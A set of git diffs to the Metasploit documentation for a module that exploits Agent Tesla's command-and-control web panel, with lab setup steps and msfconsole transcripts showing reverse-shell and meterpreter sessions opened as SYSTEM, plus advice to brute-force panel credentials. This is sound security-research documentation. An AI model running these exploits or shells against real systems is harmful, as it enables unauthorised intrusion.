-msf5 exploit(multi/http/agent_tesla_panel_rce) > set target 2
-target => 2
-msf5 exploit(multi/http/agent_tesla_panel_rce) > run
+msf5 > use exploit/multi/http/agent_tesla_panel_rce
+msf5 exploit(multi/http/agent_tesla_panel_rce) > show options
 
-[*] Started reverse TCP handler on 192.168.1.13:4444
-[*] Sending cmd/windows/reverse_powershell command payload
-[*] Command shell session 2 opened (192.168.1.13:4444 -> 192.168.1.21:1040) at 2019-09-04 01:28:55 +0400
+Module options (exploit/multi/http/agent_tesla_panel_rce):
 
-Microsoft Windows [Version 6.1.7601]
-Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD                    no        The Agent Tesla CnC password to authenticate with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /WebPanel/       yes       The URI where the Agent Tesla CnC panel is located on the target
+   USERNAME                    no        The Agent Tesla CnC username to authenticate with
+   VHOST                       no        HTTP server virtual host
 
-C:\wamp64\www\WebPanel\server_side\scripts>whoami
-nt authority\system
 
-C:\wamp64\www\WebPanel\server_side\scripts>
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic (PHP-Dropper)
+
+
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5
+LHOST => 169.254.115.5
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set USERNAME test
+USERNAME => test
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set PASSWORD test
+PASSWORD => test
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set RHOSTS 169.254.162.16
+RHOSTS => 169.254.162.16
+msf5 exploit(multi/http/agent_tesla_panel_rce) > show options
+
+Module options (exploit/multi/http/agent_tesla_panel_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   test             no        The Agent Tesla CnC password to authenticate with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     169.254.162.16   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /WebPanel/       yes       The URI where the Agent Tesla CnC panel is located on the target
+   USERNAME   test             no        The Agent Tesla CnC username to authenticate with
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  169.254.115.5    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic (PHP-Dropper)
+
+
+msf5 exploit(multi/http/agent_tesla_panel_rce) > exploit
+
+[*] Started reverse TCP handler on 169.254.115.5:4444
+[*] Targeted operating system is: windows
+[*] Sending php/meterpreter/reverse_tcp command payload
+[*] Payload uploaded as: .UKtE.php to C:\wamp64\www\\WebPanel\\server_side\scripts\.UKtE.php
+[*] Sending stage (38288 bytes) to 169.254.162.16
+[*] Meterpreter session 1 opened (169.254.115.5:4444 -> 169.254.162.16:51698) at 2020-06-16 14:55:19 -0500
+[+] Deleted C:\wamp64\www\\WebPanel\\server_side\scripts\.UKtE.php
+
+meterpreter > ls
+Listing: C:\wamp64\www\WebPanel\server_side\scripts
+===================================================
+
+Mode              Size   Type  Last modified              Name
+----              ----   ----  -------------              ----
+100666/rw-rw-rw-  2244   fil   2016-09-21 18:10:39 -0500  ids-arrays.php
+100666/rw-rw-rw-  2235   fil   2016-09-21 18:10:39 -0500  ids-objects.php
+100666/rw-rw-rw-  2069   fil   2016-09-21 18:10:39 -0500  jsonp.php
+100666/rw-rw-rw-  7959   fil   2016-09-21 18:10:40 -0500  mysql.sql
+100666/rw-rw-rw-  1453   fil   2016-09-21 18:10:40 -0500  objects.php
+100666/rw-rw-rw-  1957   fil   2016-09-21 18:10:40 -0500  post.php
+100666/rw-rw-rw-  7921   fil   2016-09-21 18:10:40 -0500  postgres.sql
+100666/rw-rw-rw-  1642   fil   2018-09-11 17:31:16 -0500  server_processing.php
+100666/rw-rw-rw-  7857   fil   2016-09-21 18:10:40 -0500  sqlite.sql
+100666/rw-rw-rw-  8021   fil   2016-09-21 18:10:40 -0500  sqlserver.sql
+100666/rw-rw-rw-  14438  fil   2016-09-30 04:53:10 -0500  ssp.class.php
+
+meterpreter > sysinfo
+Computer    : DESKTOP-EMAVUN1
+OS          : Windows NT DESKTOP-EMAVUN1 10.0 build 18363 (Windows 10) AMD64
+Meterpreter : php/windows
+meterpreter > getuid
+Server username: SYSTEM (0)
+meterpreter >
 ```

--- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
@@ -2,7 +2,12 @@
 
 ### Description
 
-This module exploits a command injection vulnerability within the control center of Agent Tesla. Attackers can turn this vulnerability into an RCE can be obtained by exploiting two vulnerabilities (SQLi + PHP Object Injection) that occur within the `WebPanel/server_side/scripts/server_processing.php` file. On versions prior to September 12th 2018, attackers can exploit this vulnerability to gain unauthenicated RCE as the user running the web server. Versions released on or after September 12th 2018 have the following fix that was introduced which means that attackers will require valid credentials in order to exploit this vulnerability:
+This module exploits a command injection vulnerability within the control center of Agent Tesla. Attackers can turn this
+vulnerability into an RCE can be obtained by exploiting two vulnerabilities (SQLi + PHP Object Injection) that occur within the
+`WebPanel/server_side/scripts/server_processing.php` file. On versions prior to September 12th 2018, attackers can exploit this
+vulnerability to gain unauthenicated RCE as the user running the web server. Versions released on or after September 12th 2018
+have the following fix that was introduced which means that attackers will require valid credentials in order to
+exploit this vulnerability:
 
 ```
 session_start();
@@ -15,18 +20,29 @@ if (!isset($_SESSION['logged_in'])
 
 **NOTE:**
 
-Using [CyberCrime Tracker](https://cybercrime-tracker.net/), it was possible to locate several Agent Tesla web panels available for download. As there are no version numbers displayed in the Agent Tesla control center, it was hard to identify exactly which releases were available for download. However it was possible to perform to determine roughly when various editions of Agent Tesla were released by using the timestamps on the files contained in the `zip` archives. From this information, it was determined that [CyberCrime Tracker](https://cybercrime-tracker.net/) had the following unique versions available for download:
+Using [CyberCrime Tracker](https://cybercrime-tracker.net/), it was possible to locate several Agent Tesla web panels
+available for download. As there are no version numbers displayed in the Agent Tesla control center, it was hard to identify
+exactly which releases were available for download. However it was possible to perform to determine roughly when various
+editions of Agent Tesla were released by using the timestamps on the files contained in the `zip` archives. From this
+information, it was determined that [CyberCrime Tracker](https://cybercrime-tracker.net/) had the following unique versions
+available for download:
 
-[WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) - Released in 2017 - (unauthenticated RCE), source code protected by `ioncube`.
-
+[WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z)
+ * Released in 2017
+ * Unauthenticated RCE
+ * Source code protected by `ioncube`.
  * Tested on Windows 7 x64 with WAMP server 3.2.0 x64 and PHP version 5.6.40.
 
-[WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) - Released in 2018 - (authenticated RCE), source code protected by `ioncube`.
-
+[WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z)
+ * Released in 2018
+ * Authenticated RCE
+ * Source code protected by `ioncube`.
  * Tested on Windows 7 x64 with WAMP server 3.2.0 x64 and PHP version 7.2.18.
 
-[WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) - Released in 2019 - (authenticated RCE), source code is not obfuscated, **don't need** `ioncube`.
-
+[WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z)
+ * Released in 2019
+ * Authenticated RCE
+ * Plain text source code, `ioncube` is **not** needed.
  * Tested on Windows 7 x64 WAMP server 3.2.0 x64 and PHP version 5.6.40.
 
 ### Setup
@@ -48,8 +64,12 @@ Using [CyberCrime Tracker](https://cybercrime-tracker.net/), it was possible to 
 10. Delete the file at `C:\wamp\www\WebPanel\config.php` if it exists.
 11. OPTIONAL: If using [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) or [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z), follow the directions to install `IornCube` in the [Installing Ioncube](#Installing%20Ioncube) section.
 11. Browse to `http://127.0.0.1/WebPanel/logout.php` to ensure you are properly logged out and then browse to `http://127.0.0.1/WebPanel/setup.php`.
-12. Set the `Database Host` field to `127.0.0.1`, the `MySql Username` field to `root`, leave the `MySql Password` field, set the `Database Name` field to `tesla` and set the `Username` and `Password` fields under `Login Informations` section to the username and password you would like to log into the web panel as.
-13. Browse to `http://127.0.0.1/WebPanel/login.php` and confirm you can log into the web panel and view the main web panel itself. You should see a header titled `Dashboard` followed by some sections labeled `Computers`, `Keystrokes`, `Passwords` and `Screenshots` if the login succeeded.
+12. Set the `Database Host` field to `127.0.0.1`, the `MySql Username` field to `root`, leave the `MySql Password` field,
+set the `Database Name` field to `tesla` and set the `Username` and `Password` fields under `Login Informations` section
+to the username and password you would like to log into the web panel as.
+13. Browse to `http://127.0.0.1/WebPanel/login.php` and confirm you can log into the web panel and view the main web
+panel itself. You should see a header titled `Dashboard` followed by some sections labeled `Computers`, `Keystrokes`,
+`Passwords` and `Screenshots` if the login succeeded.
 
 #### Installing Ioncube
 
@@ -68,7 +88,8 @@ Follow [Install WAMP Server 3.2.0 on Windows 10 x64](#Install%20WAMP%20Server%20
 5. Select `Local install`
 6. Follow the installation instructions.
 7. Right click on the WAMP tray icon and click `Refresh`.
-8. Browse to `http://127.0.0.1/loader-wizard/ioncube/loader-wizard.php?timeout=0&ini=0&page=loader_check` and verify that ionCube Loader was installed successfully.
+8. Browse to `http://127.0.0.1/loader-wizard/ioncube/loader-wizard.php?timeout=0&ini=0&page=loader_check` and verify
+that ionCube Loader was installed successfully.
 
 ## Verification Steps
 
@@ -76,15 +97,15 @@ Follow [Setup](#Setup) and [Scenarios](#Scenarios).
 
 ## Options
 
-**PASSWORD**
+### PASSWORD
 
 The Agent Tesla CnC password to authenticate with (needed for authenticated RCE exploitation).
 
-**TARGETURI**
+### TARGETURI
 
 The base URI path of control center. Default: '/WebPanel'
 
-**USERNAME**
+### USERNAME
 
 The Agent Tesla CnC username to authenticate with (needed for authenticated RCE exploitation).
 

--- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
@@ -4,7 +4,7 @@ This module exploit a command injection vulnerability (authenticated and unauthe
 
 The Unauthenticated RCE is possible by mixing two vulnerabilities (SQLi + PHP Object Injection).
 
-By observing other sources of this panel find on the Internet to watch the patch, I concluded that the vulnerability is transfomed to an Authenticated RCE.
+By observing other sources of this panel I found on the Internet to watch the patch, I concluded that the vulnerability was transfomed to an Authenticated RCE.
 
 ## Setup
 
@@ -13,26 +13,113 @@ Resources for testing are available here:
 
 ### Windows
 
-For WebPanel1.7z (unauthenticated RCE), I used WAMP server 3.1.9 x64 configured with PHP version 5.6.40 (for ioncube compatibility).
+For [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) (unauthenticated RCE), I used WAMP server 3.1.9 x64 configured with PHP version 5.6.40 (for ioncube compatibility).
 
-For WebPanel2.7z (authenticated RCE), I used WAMP server 3.1.9 x64 configured with PHP version 7.2.18 (for ioncube compatibility).
+For [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) (authenticated RCE), I used WAMP server 3.1.9 x64 configured with PHP version 7.2.18 (for ioncube compatibility).
 
-For WebPanel3.7z (authenticated RCE), I used WAMP server 3.1.9 x64 configured with PHP version 7.2.18 (source code is not obfuscated, don't need ioncube).
+For [WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) (authenticated RCE), I used WAMP server 3.1.9 x64 configured with PHP version 7.2.18 (source code is not obfuscated, don't need ioncube).
+
+#### Install WAMP Server 3.2.0
+
+For this, I use a Microsoft Windows 7 x64 as sandboxing system with analysis tools like [FlareVM](https://github.com/fireeye/flare-vm).
+
+You must install simply the latest version of [WAMP Server](https://sourceforge.net/projects/wampserver/files/latest/download) (at this date the used version is 3.2.0).
+
+1. Install `Wamp` using default installer configuration.
+2. Start `Wamp` and right click on the icon of started application and ***check*** `Wamp Settings > Allow VirtualHost local IP's others than 127.*`.
+3. Allow access to wamp server in local area network.
+
+For the this WAMP Server version:
+
+Edit the `httpd-vhost.conf` file into `c:/wamp64/bin/apache/apache2.4.41/conf/extra/` directory.
+
+Replace the line containig  `Require local` by `Require all granted`.
+
+4. Use the preinstalled `phpmyadmin` of `Wamp` for create a blank database for Agant Tesla web panel.
 
 ### Linux
 
-For WebPanel1.7z (unauthenticated RCE), I used a Debian 9 on which I installed PHP version 5.6.40 (for ioncube compatibility).
+For [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) (unauthenticated RCE), I used a Debian 9 on which I installed PHP version 5.6.40 (for ioncube compatibility).
 
-For WebPanel2.7z (authenticated RCE), I used a Debian 9 on which I installed the default PHP version (for ioncube compatibility).
+For [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) (authenticated RCE), I used a Debian 9 on which I installed the default PHP version (for ioncube compatibility).
 
-For WebPanel3.7z (unauthenticated RCE), I used a Debian 9 on which I installed the default PHP version (source code is not obfuscated, don't need ioncube).
+For [WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) (unauthenticated RCE), I used a Debian 9 on which I installed the default PHP version (source code is not obfuscated, don't need ioncube).
+
+#### Install LAMP (Apache, MySQL, PHP)
+
+For this, I use a Linux Debian 9.9.0 (Stretch) x86_x64 as sandboxing system.
+
+1. Install LAMP (Apache, MySQL, PHP).
+
+```bash
+sudo apt-get install apache2 apache2-utils mariadb-server mariadb-client ca-certificates apt-transport-https
+
+wget -q https://packages.sury.org/php/apt.gpg -O- | sudo apt-key add -
+sudo apt-get update
+sudo apt install php5.6 php5.6-cli php5.6-common php5.6-curl php5.6-mbstring php5.6-mysql php5.6-xml libapache2-mod-php5.6 php5.6-json php5.6-opcache php5.6-readline
+
+sudo mysql_secure_installation
+```
+
+2. Create a blank database for Agant Tesla web panel.
+
+```
+sudo mysql -u root -ppassword
+
+CREATE DATABASE tesla;
+CREATE USER 'user' IDENTIFIED BY 'password';
+GRANT USAGE ON *.* TO 'user'@localhost IDENTIFIED BY 'password';
+GRANT ALL PRIVILEGES ON `tesla`.* TO 'user'@localhost;
+FLUSH PRIVILEGES;
+exit
+```
+
+### Install Agent Tesla Web panel (simple way)
+
+For this step, you need a functional web environment installed and to have created an empty database (refer to the configuration above).
+
+NOTE: I tracked Agent Tesla panels on the web and I got the sources for these panels by looking for the `WebPanel.zip` file. Some attackers are stupid and leave this file lying around on the server.
+
+The [WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) should be used preferably because it is ***not protected*** by `ioncube` and because of this the source code is in clear (but all the other panels are functional with a little more complicated configuration).
+
+I am based on the file creation dates (and diff) to get an idea of ​​the panels evolution, You have more details (in french) on my blog post [Agent Tesla Remote Command Execution (fighting the WebPanel)](https://www.pirates.re/agent-tesla-remote-command-execution-fighting-the-webpanel/).
+
+***IMPORTANT:*** This version of the panel is "by default" patched against unauthenticated RCE. But as I explain in my blog, the patch simply consist adding authentication on the vulnerable page. And that the variables are still not properly sanitized.
+
+To put it simply, with this version of the panel, by default you have an 'Authenticated RCE'.
+
+Now, if you want to "switch" to test simply the `Unauthenticated RCE` with this panel, ***just put the authentication in comment*** on the `WebPanel/server_side/scripts/server_processing.php` page.
+
+As example:
+
+```php
+/* // Comment the authentication.
+session_start();
+  if (!isset($_SESSION['logged_in'])
+    || $_SESSION['logged_in'] !== true) {
+    header('Location: login.php');
+    exit;
+  }
+*/
+```
+
+1. Uncompress the [WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) into your Web directory.
+2. Remove the config file `WebPanel/config.php` (it is generated at step 3).
+3. Go to: <http://localhost/WebPanel/setup.php>.
+4. You can log into Agent Tesla Web panel, all is done.
 
 ## Verification Steps
 
-1. Install the module as usual
-2. Start msfconsole
-3. Do: `use exploit/multi/http/agent_tesla_panel_rce`
-4. Do: `set RHOSTS 192.168.0.15`
+1. Start msfconsole
+2. Do: `use exploit/multi/http/agent_tesla_panel_rce`
+3. Do: `set RHOSTS IP`
+4. Do: `run`
+--or--
+1. Start msfconsole
+2. Do: `use exploit/multi/http/agent_tesla_panel_rce`
+3. Do: `set RHOSTS IP`
+4. Do: `set USERNAME REDACTED`
+5. Do: `set PASSWORD REDACTED`
 5. Do: `run`
 
 ## Targets
@@ -49,7 +136,7 @@ For WebPanel3.7z (unauthenticated RCE), I used a Debian 9 on which I installed t
 
 **PASSWORD**
 
-The Agent Tesla CnC password to authenticate with (needed if you attemp an authenticated RCE).
+The Agent Tesla CnC password to authenticate with (needed if you attempt an authenticated RCE).
 
 **Proxies**
 
@@ -57,7 +144,7 @@ A proxy chain of format type:host:port[,type:host:port][...]. It's optional.
 
 **RHOSTS**
 
-The target IP adress on which the control center responds.
+The target IP address on which the control center responds.
 
 **RPORT**
 
@@ -73,7 +160,7 @@ The base URI path of control center. Default: '/WebPanel'
 
 **USERNAME**
 
-The Agent Tesla CnC username to authenticate with (needed if you attemp an authenticated RCE).
+The Agent Tesla CnC username to authenticate with (needed if you attempt an authenticated RCE).
 
 **VHOST**
 
@@ -175,8 +262,7 @@ msf5 exploit(multi/http/agent_tesla_panel_rce) >
 
 ## References
 
-  1. <https://www.cyber.nj.gov/threat-profiles/trojan-variants/agent-tesla>
-  2. <https://krebsonsecurity.com/2018/10/who-is-agent-tesla/>
-  3. <https://github.com/mekhalleh/agent_tesla_panel_rce/tree/master/resources/>
-  4. <https://www.exploit-db.com/exploits/47256>
-  5. <https://www.pirates.re/agent-tesla-remote-command-execution-(fighting-the-webpanel)>
+  1. <https://krebsonsecurity.com/2018/10/who-is-agent-tesla/>
+  2. <https://github.com/mekhalleh/agent_tesla_panel_rce/tree/master/resources/>
+  3. <https://www.exploit-db.com/exploits/47256>
+  4. <https://www.pirates.re/agent-tesla-remote-command-execution-(fighting-the-webpanel)>

--- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
@@ -51,19 +51,27 @@ available for download:
 
 ##### Install WAMP Server 3.2.0 on Windows 10 x64
 
-1. Download the latest version of [WAMP Server](https://sourceforge.net/projects/wampserver/files/latest/download) and install it using the default settings.
+1. Download the latest version of [WAMP Server](https://sourceforge.net/projects/wampserver/files/latest/download)
+and install it using the default settings.
 2. Search for `Wamp` within the search bar and click on the result titled `Wampserver64`, or run `C:\\wamp64\\wampmanager.exe`.
-3. Wait for the application to start, and then right click on the purple/green W within the tray and ***check*** `Wamp Settings > Allow VirtualHost local IP's others than 127.*`.
+3. Wait for the application to start, and then right click on the purple/green W within the
+tray and ***check*** `Wamp Settings > Allow VirtualHost local IP's others than 127.*`.
 4. Open `c:/wamp64/bin/apache/apache2.4.41/conf/extra/httpd-vhosts.conf` and replace the line `Require local` with `Require all granted`.
-5. Select PHP version 5.6.40 by selecting `PHP > Version > 5.6.40` (***left click*** on started application icon) and wait for the icon to go from brown to green again.
+5. Select PHP version 5.6.40 by selecting `PHP > Version > 5.6.40` (***left click*** on started application icon)
+and wait for the icon to go from brown to green again.
 6. Browse to `http://127.0.0.1/phpmyadmin/` and log in with the username `root` and a blank password.
-7. On the page `http://127.0.0.1/phpmyadmin/index.php`, find the list of databases on the left hand side of the page and click the `New` button above it.
-8. Under the `Create database` section, set the database name to `tesla` and set the text type to `utf8_general_ci`. Then click the `Create` button.
+7. On the page `http://127.0.0.1/phpmyadmin/index.php`, find the list of databases on the left hand
+side of the page and click the `New` button above it.
+8. Under the `Create database` section, set the database name to `tesla` and set the text type
+to `utf8_general_ci`. Then click the `Create` button.
 9. Confirm the database was created, and afterwards log out of `PHPMyAdmin`.
 9. Unzip one of the 7zip files. You should see a folder called `WebPanel` that is contained within. Copy this folder to `C:\wamp64\www`.
 10. Delete the file at `C:\wamp\www\WebPanel\config.php` if it exists.
-11. OPTIONAL: If using [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) or [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z), follow the directions to install `IornCube` in the [Installing Ioncube](#Installing%20Ioncube) section.
-11. Browse to `http://127.0.0.1/WebPanel/logout.php` to ensure you are properly logged out and then browse to `http://127.0.0.1/WebPanel/setup.php`.
+11. OPTIONAL: If using [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z)
+or [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z), follow the directions
+to install `IornCube` in the [Installing Ioncube](#Installing%20Ioncube) section.
+11. Browse to `http://127.0.0.1/WebPanel/logout.php` to ensure you are properly logged out and
+then browse to `http://127.0.0.1/WebPanel/setup.php`.
 12. Set the `Database Host` field to `127.0.0.1`, the `MySql Username` field to `root`, leave the `MySql Password` field,
 set the `Database Name` field to `tesla` and set the `Username` and `Password` fields under `Login Informations` section
 to the username and password you would like to log into the web panel as.
@@ -78,10 +86,12 @@ panel itself. You should see a header titled `Dashboard` followed by some sectio
 Follow [Install WAMP Server 3.2.0 on Windows 10 x64](#Install%20WAMP%20Server%203.2.0%20on%20Windows%2010%20x64) steps.
 
 1. Download [ioncube loader wizard](https://www.ioncube.com/loader-wizard/loader-wizard.zip).
-2. Make sure you have the proper version of PHP selected within `Wamp` for the WebPanel you want install before using `ioncube loader wizard`.
+2. Make sure you have the proper version of PHP selected within `Wamp` for the WebPanel
+you want install before using `ioncube loader wizard`.
 
   * For [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) you need PHP 5.6.40.
-  * For [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) you can use PHP 7.2.18 or PHP 7.3.12.
+  * For [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) you can
+  use PHP 7.2.18 or PHP 7.3.12.
 
 3. Uncompress the contents of `loader-wizard.zip` into `C:\Wamp64\www\loader-wizard`.
 4. Browse to http://localhost/loader-wizard/ioncube/loader-wizard.php.

--- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
@@ -65,8 +65,8 @@ For this, you can use a Linux Debian 9.9.0 (Stretch) x86_x64 as sandboxing syste
 1. Install LAMP (Apache, MySQL, PHP).
 
 ```bash
-sudo apt-add repository ppa:ondrej/apache2
-sudo apt-add repository ppa:ondrej/php
+sudo apt-add-repository ppa:ondrej/apache2
+sudo apt-add-repository ppa:ondrej/php
 sudo apt-get update
 sudo apt-get install apache2 apache2-utils mariadb-server mariadb-client ca-certificates apt-transport-https
 

--- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
@@ -75,13 +75,11 @@ sudo apt-get install php5.6 php5.6-cli php5.6-common php5.6-curl php5.6-mbstring
 
 # For PHP 7.2.31:
 sudo apt-get install php7.2 php7.2-cli php7.2-common php7.2-curl php7.2-mbstring php7.2-mysql php7.2-xml libapache2-mod-php7.2 php7.2-json php7.2-opcache php7.2-readline
-
-Finally:
-
-sudo mysql_secure_installation
 ```
 
-2. Create a blank database for the Agent Tesla web panel.
+2. Execute `sudo mysql_secure_installation` and press enter when prompted for the `root` password, set a new `root` user password (be sure to remember this!) and press `Y` for the rest of the prompts.
+
+3. Create a blank database for Agent Tesla using the following commands:
 
 ```
 sudo mysql -u root -ppassword
@@ -94,7 +92,7 @@ FLUSH PRIVILEGES;
 exit
 ```
 
-3. Get the Agent Tesla control panels
+4. Download the Agent Tesla control panels locally:
 
 ```
 wget https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z
@@ -108,16 +106,18 @@ sudo apt install p7zip-full
 7z x WebPanel1.7z && mv WebPanel/ WebPanel1/
 7z x WebPanel2.7z && mv WebPanel/ WebPanel2/
 7z x WebPanel3.7z && mv WebPanel/ WebPanel3/
-
+chmod a+rw WebPanel*/
 ```
 5. Copy one of the target webpanels over for installation and delete the default config.php file
 ```
-sudo cp -r WebPanel3/WebPanel/ /var/www/html/
+sudo cp -r WebPanel3/ /var/www/html/
+sudo mv /var/www/html/WebPanel3/ /var/www/html/WebPanel/
 sudo rm -rf /var/www/html/WebPanel/config.php
 ```
 6. Make the /var/www/html/WebPanel/ directory readable and writeable by all
 ```
-chmod a+rw /var/www/html/WebPanel/
+sudo chmod -R a+rw /var/www/html/WebPanel/
+sudo chown -R www-data:www-data /var/www/html/WebPanel/
 ```
 7. Browse to http://127.0.0.1/WebPanel/setup.php and set the `Database Host` field to `127.0.0.1`, the `MySql Username` field to `user`, the `MySql Password` field to `password`, the `Database Name` field to `tesla`, the `Username` and `Password` fields under `Login Informations` section to the username and password you would like to log into the web panel as.
 

--- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
@@ -130,7 +130,7 @@ Follow [Setup](#Setup) and [Scenarios](#Scenarios).
 
 **PASSWORD**
 
-The Agent Tesla CnC password to authenticate with (needed if you attempt an authenticated RCE).
+The Agent Tesla CnC password to authenticate with (needed for authenticated RCE exploitation).
 
 **TARGETURI**
 
@@ -138,7 +138,7 @@ The base URI path of control center. Default: '/WebPanel'
 
 **USERNAME**
 
-The Agent Tesla CnC username to authenticate with (needed if you attempt an authenticated RCE).
+The Agent Tesla CnC username to authenticate with (needed for authenticated RCE exploitation).
 
 ## Targets
 
@@ -151,8 +151,6 @@ The Agent Tesla CnC username to authenticate with (needed if you attempt an auth
 ```
 
 ## Scenarios
-
-**IMPORTANT:** However, is possible of found a 2017 control center version which normally are supposed to be vulnerable to an unauthenticated RCE, which was manually patched by the bots master. In real life, if the unauthenticated attempt doesn't work try to guess the credentials by brute-forcing the panel authentication.
 
 ### Agent Tesla (panel < September 12 2018) Unauthenticated on Linux
 
@@ -243,10 +241,3 @@ nt authority\system
 
 C:\wamp64\www\WebPanel\server_side\scripts>
 ```
-
-## References
-
-  1. <https://krebsonsecurity.com/2018/10/who-is-agent-tesla/>
-  2. <https://github.com/mekhalleh/agent_tesla_panel_rce/tree/master/resources/>
-  3. <https://www.exploit-db.com/exploits/47256>
-  4. <https://www.pirates.re/agent-tesla-remote-command-execution-(fighting-the-webpanel)>

--- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
@@ -3,9 +3,9 @@
 ### Description
 
 This module exploits a command injection vulnerability within the control center of Agent Tesla. Attackers can turn this
-vulnerability into an RCE can be obtained by exploiting two vulnerabilities (SQLi + PHP Object Injection) that occur within the
+vulnerability into an RCE that can be obtained by exploiting two vulnerabilities (SQLi + PHP Object Injection) that occur within the
 `WebPanel/server_side/scripts/server_processing.php` file. On versions prior to September 12th 2018, attackers can exploit this
-vulnerability to gain unauthenicated RCE as the user running the web server. Versions released on or after September 12th 2018
+vulnerability to gain unauthenticated RCE as the user running the web server. Versions released on or after September 12th 2018
 have the following fix that was introduced which means that attackers will require valid credentials in order to
 exploit this vulnerability:
 
@@ -22,7 +22,7 @@ if (!isset($_SESSION['logged_in'])
 
 Using [CyberCrime Tracker](https://cybercrime-tracker.net/), it was possible to locate several Agent Tesla web panels
 available for download. As there are no version numbers displayed in the Agent Tesla control center, it was hard to identify
-exactly which releases were available for download. However it was possible to perform to determine roughly when various
+exactly which releases were available for download. However it was possible to determine roughly when various
 editions of Agent Tesla were released by using the timestamps on the files contained in the `zip` archives. From this
 information, it was determined that [CyberCrime Tracker](https://cybercrime-tracker.net/) had the following unique versions
 available for download:
@@ -69,7 +69,7 @@ to `utf8_general_ci`. Then click the `Create` button.
 10. Delete the file at `C:\wamp\www\WebPanel\config.php` if it exists.
 11. OPTIONAL: If using [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z)
 or [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z), follow the directions
-to install `IornCube` in the [Installing Ioncube](#Installing%20Ioncube) section.
+to install `IonCube` in the [Installing Ioncube](#Installing%20Ioncube) section.
 11. Browse to `http://127.0.0.1/WebPanel/logout.php` to ensure you are properly logged out and
 then browse to `http://127.0.0.1/WebPanel/setup.php`.
